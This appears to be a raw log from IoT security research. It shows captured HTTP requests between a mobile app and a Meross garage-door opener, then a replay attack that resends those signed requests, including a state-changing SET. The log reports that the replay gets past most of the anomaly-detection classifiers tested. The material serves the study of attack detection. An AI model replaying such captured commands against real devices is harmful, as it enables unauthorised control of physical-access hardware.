POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"6080d173af9a2a24f0c203fe2c534493","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"82d3647625c5407ea85462c66c7b3ff8","timestamp":1694943376,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"6080d173af9a2a24f0c203fe2c534493","namespace":"Appliance.System.All","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943377,"timestampMs":347,"sign":"73cbe77e4036c150e38f20dd2829e1f5"},"payload":{"all":{"system":{"hardware":{"type":"msg100","subType":"us","version":"4.0.0","chipType":"MT7686","uuid":"2210197269145761070248e1e9abec1b","macAddress":"48:e1:e9:ab:ec:1b"},"firmware":{"version":"4.2.6","homekitVersion":"2.0.1","compileTime":"Oct 24 2022 10:28:41","encrypt":1,"wifiMac":"28:e3:47:c2:d9:cc","innerIp":"10.13.0.32","server":"mqtt-us-2.meross.com","port":443,"userId":3094003},"time":{"timestamp":1694943377,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":0}],"triggerx":[{"channel":0,"id":"1111111111111111","count":1}],"timerx":[],"garageDoor":[{"channel":0,"open":1,"lmTime":
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"c64667c3b2a3cc7ff7c03ce10fa4eab7","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"27407df5594e032e769d75ad8ea1fd0c","timestamp":1694943376,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"c64667c3b2a3cc7ff7c03ce10fa4eab7","namespace":"Appliance.System.Online","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943377,"timestampMs":433,"sign":"4af018c7c600f058a2b285c74c1e55ed"},"payload":{"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}}}

{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"715b6e972d876fc35272f1ebb5e3e616","method":"GET","namespace":"Appliance.Digest.TimerX","payloadVersion":1,"sign":"87b729916cc8b29a988b37d78b40d1a1","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"baf701d2ac66faf1b0d5d3bf55c8aca7","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"2a6db3ab912cb8b6476084b418c8caa5","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"51625e7ee3412c2c3233c38a009fffa2","method":"GET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"e502dceb068cb6babcc0a045b706e7b6","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"549bf5d4daf6ad5be1270add4d444c42","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"e2f58bd22cdeed90ec04c5ce7dd57253","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"715b6e972d876fc35272f1ebb5e3e616","namespace":"Appliance.Digest.TimerX","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943384,"timestampMs":83,"sign":"87b729916cc8b29a988b37d78b40d1a1"},"payload":{"digest":[]}}

HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"baf701d2ac66faf1b0d5d3bf55c8aca7","namespace":"Appliance.GarageDoor.Config","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943385,"timestampMs":94,"sign":"48fa7f02d06e00ca0cd9f0e62df96a58"},"payload":{"config":{"signalDuration":2000,"buzzerEnable":0,"doorOpenDuration":5000,"doorCloseDuration":5000}}}

HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"51625e7ee3412c2c3233c38a009fffa2","namespace":"Appliance.System.DNDMode","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943385,"timestampMs":102,"sign":"71d2f67908b528071943d789b4ec8385"},"payload":{"DNDMode":{"mode":1}}}

HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"549bf5d4daf6ad5be1270add4d444c42","namespace":"Appliance.GarageDoor.Config","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943385,"timestampMs":112,"sign":"04d42abad59de19f5e191c001df6f3bb"},"payload":{"config":{"signalDuration":2000,"buzzerEnable":0,"doorOpenDuration":5000,"doorCloseDuration":5000}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 315
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"7d7082252b7ef88ac5de173971454bd5","method":"GET","namespace":"Appliance.Digest.TriggerX","payloadVersion":1,"sign":"111618d35820b2362bc985bbfcc849dd","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"7d7082252b7ef88ac5de173971454bd5","namespace":"Appliance.Digest.TriggerX","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943385,"timestampMs":169,"sign":"63d07c77ab8a6ea46de41ee847f3b5bc"},"payload":{"digest":[{"channel":0,"id":"1111111111111111","count":1}]}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"91555648e894a67e617631b24018d14a","method":"GET","namespace":"Appliance.System.Runtime","payloadVersion":1,"sign":"29d8b3f0e8237319d85a1ac7035e5a67","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"91555648e894a67e617631b24018d14a","namespace":"Appliance.System.Runtime","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943385,"timestampMs":609,"sign":"c09eb516eea23813f1bceae91dab39c7"},"payload":{"runtime":{"signal":100}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 334
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"aaa9de56ec65db3e95402c531798a17b","method":"SET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"7078e934a2114b7ece34ebec9bea8070","timestamp":1694943389,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{"DNDMode":{"mode":0}}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"aaa9de56ec65db3e95402c531798a17b","namespace":"Appliance.System.DNDMode","triggerSrc":"AndroidLocal","method":"SETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943389,"timestampMs":903,"sign":"7078e934a2114b7ece34ebec9bea8070"},"payload":{}}

START REPLAY ATTACK
#######################################################################################
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 334
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"aaa9de56ec65db3e95402c531798a17b","method":"SET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"7078e934a2114b7ece34ebec9bea8070","timestamp":1694943389,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{"DNDMode":{"mode":0}}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"aaa9de56ec65db3e95402c531798a17b","namespace":"Appliance.System.DNDMode","triggerSrc":"AndroidLocal","method":"SETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943509,"timestampMs":88,"sign":"b4857cfd12af26a1abc8e8ecbe247a90"},"payload":{}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"91555648e894a67e617631b24018d14a","method":"GET","namespace":"Appliance.System.Runtime","payloadVersion":1,"sign":"29d8b3f0e8237319d85a1ac7035e5a67","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"91555648e894a67e617631b24018d14a","namespace":"Appliance.System.Runtime","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943509,"timestampMs":98,"sign":"f20524234cdec4081c9a3ff1df0aa660"},"payload":{"runtime":{"signal":100}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 315
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"7d7082252b7ef88ac5de173971454bd5","method":"GET","namespace":"Appliance.Digest.TriggerX","payloadVersion":1,"sign":"111618d35820b2362bc985bbfcc849dd","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"7d7082252b7ef88ac5de173971454bd5","namespace":"Appliance.Digest.TriggerX","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943509,"timestampMs":115,"sign":"6eba5a904eaae51237d433631fa1debc"},"payload":{"digest":[{"channel":0,"id":"1111111111111111","count":1}]}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"715b6e972d876fc35272f1ebb5e3e616","method":"GET","namespace":"Appliance.Digest.TimerX","payloadVersion":1,"sign":"87b729916cc8b29a988b37d78b40d1a1","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"715b6e972d876fc35272f1ebb5e3e616","namespace":"Appliance.Digest.TimerX","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943509,"timestampMs":132,"sign":"343139310113f9c6dce590cc492cca1a"},"payload":{"digest":[]}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"baf701d2ac66faf1b0d5d3bf55c8aca7","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"2a6db3ab912cb8b6476084b418c8caa5","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=
****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"51625e7ee3412c2c3233c38a009fffa2","method":"GET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"e502dceb068cb6babcc0a045b706e7b6","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=
****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"549bf5d4daf6ad5be1270add4d444c42","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"e2f58bd22cdeed90ec04c5ce7dd57253","timestamp":1694943384,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=
****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"c64667c3b2a3cc7ff7c03ce10fa4eab7","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"27407df5594e032e769d75ad8ea1fd0c","timestamp":1694943376,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"c64667c3b2a3cc7ff7c03ce10fa4eab7","namespace":"Appliance.System.Online","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943510,"timestampMs":149,"sign":"2b8844ca713dc682e10924573f9782ae"},"payload":{"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"6080d173af9a2a24f0c203fe2c534493","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"82d3647625c5407ea85462c66c7b3ff8","timestamp":1694943376,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"6080d173af9a2a24f0c203fe2c534493","namespace":"Appliance.System.All","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694943510,"timestampMs":161,"sign":"ab4b1d956a0188fde7e3376b35eca6a8"},"payload":{"all":{"system":{"hardware":{"type":"msg100","subType":"us","version":"4.0.0","chipType":"MT7686","uuid":"2210197269145761070248e1e9abec1b","macAddress":"48:e1:e9:ab:ec:1b"},"firmware":{"version":"4.2.6","homekitVersion":"2.0.1","compileTime":"Oct 24 2022 10:28:41","encrypt":1,"wifiMac":"28:e3:47:c2:d9:cc","innerIp":"10.13.0.32","server":"mqtt-us-2.meross.com","port":443,"userId":3094003},"time":{"timestamp":1694943510,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":0}],"triggerx":[{"channel":0,"id":"1111111111111111","count":1}],"timerx":[],"garageDoor":[{"channel":0,"open":1,"lmTime":
****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
